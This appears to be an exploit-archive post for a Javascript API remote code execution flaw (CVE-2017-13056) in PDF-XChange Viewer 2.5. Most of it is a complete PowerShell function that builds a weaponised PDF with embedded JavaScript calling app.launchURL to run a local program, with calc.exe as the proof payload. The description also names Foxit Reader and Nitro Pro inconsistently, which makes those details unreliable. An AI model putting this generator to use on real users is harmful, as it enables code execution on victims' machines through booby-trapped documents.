PDF-XChange Viewer version 2.5 (Build 314.0) suffers from a javascript API remote code execution vulnerability.
95670a27a8d84b139aea1f89f227147b
# Exploit Title: PDF-XChange Viewer 2.5 (Build 314.0) Javascript API Remote Code Execution Exploit (Powershell PDF Exploit Creation)
# Date: 21-08-2017
# Software Link 32bit: http://pdf-xchange-viewer.it.uptodown.com/windows
# Exploit Author: Daniele Votta
# Contact: [email protected]
# Website: https://www.linkedin.com/in/vottadaniele/
# CVE: 2017-13056
# Category: PDF Reader RCE
1. Description
This module exploits an unsafe Javascript API implemented in PDF-XChange Viewer.
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader.
User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
The specific flaw exists within app.launchURL method. The issue results from the lack of proper validation of a user-supplied string
before using it to execute a system call. An attacker can leverage this vulnerability to execute code under the context of the current process.
The launchURL() function allows an attacker to execute local files on the file system and bypass the security dialog.
2. Proof of Concept (Generate evil PDF that start calc.exe)
Step 1: Customize New-PDFjs.ps1 (custom params + PdfSharp-WPF.dll path)
Step 2: Execute Windows PowerShell: PS C:\Users\User> New-PDFJS
Step 3: Open the generated PDF with Nitro Pro PDF Reader
3. PDF Generation:
function New-PDFJS {
# Use the desidered params
[CmdletBinding()]
Param (
[string]$js ="app.launchURL('C:\\Windows\\System32\\calc.exe')",
[string]$msg = "Hello PDF",
[string]$filename = "C:\Users\User\Desktop\calc.pdf"
)
# Use the PDFSharp-WPF.dll library path
Add-Type -Path C:\Users\Daniele\Desktop\PdfSharp-WPF.dll
$doc = New-Object PdfSharp.Pdf.PdfDocument
$doc.Info.Title = $msg
$doc.info.Creator = "AnonymousUser"
$page = $doc.AddPage()
$graphic = [PdfSharp.Drawing.XGraphics]::FromPdfPage($page)
$font = New-Object PdfSharp.Drawing.XFont("Courier New", 20, [PdfSharp.Drawing.XFontStyle]::Bold)
$box = New-Object PdfSharp.Drawing.XRect(0,0,$page.Width, 100)
$graphic.DrawString($msg, $font, [PdfSharp.Drawing.XBrushes]::Black, $box, [PdfSharp.Drawing.XStringFormats]::Center)
$dictjs = New-Object PdfSharp.Pdf.PdfDictionary
$dictjs.Elements["/S"] = New-Object PdfSharp.Pdf.PdfName ("/JavaScript")
$dictjs.Elements["/JS"] = New-Object PdfSharp.Pdf.PdfStringObject($doc, $js);
$doc.Internals.AddObject($dictjs)
$dict = New-Object PdfSharp.Pdf.PdfDictionary
$pdfarray = New-Object PdfSharp.Pdf.PdfArray
$embeddedstring = New-Object PdfSharp.Pdf.PdfString("EmbeddedJS")
$dict.Elements["/Names"] = $pdfarray
$pdfarray.Elements.Add($embeddedstring)
$pdfarray.Elements.Add($dictjs.Reference)
$doc.Internals.AddObject($dict)
$dictgroup = New-Object PdfSharp.Pdf.PdfDictionary
$dictgroup.Elements["/JavaScript"] = $dict.Reference
$doc.Internals.Catalog.Elements["/Names"] = $dictgroup
$doc.Save($filename)
}